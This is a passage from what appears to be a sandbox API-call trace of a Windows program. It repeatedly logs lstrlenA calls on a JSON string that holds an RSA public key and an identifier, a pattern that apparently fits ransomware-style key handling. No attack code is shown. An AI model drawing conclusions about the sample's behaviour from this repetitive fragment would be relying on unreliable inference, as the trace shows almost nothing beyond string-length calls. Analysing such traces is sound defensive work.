KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.934] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.934] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0112.935] lstrlenA (lpString="-----BEGIN PUBLIC 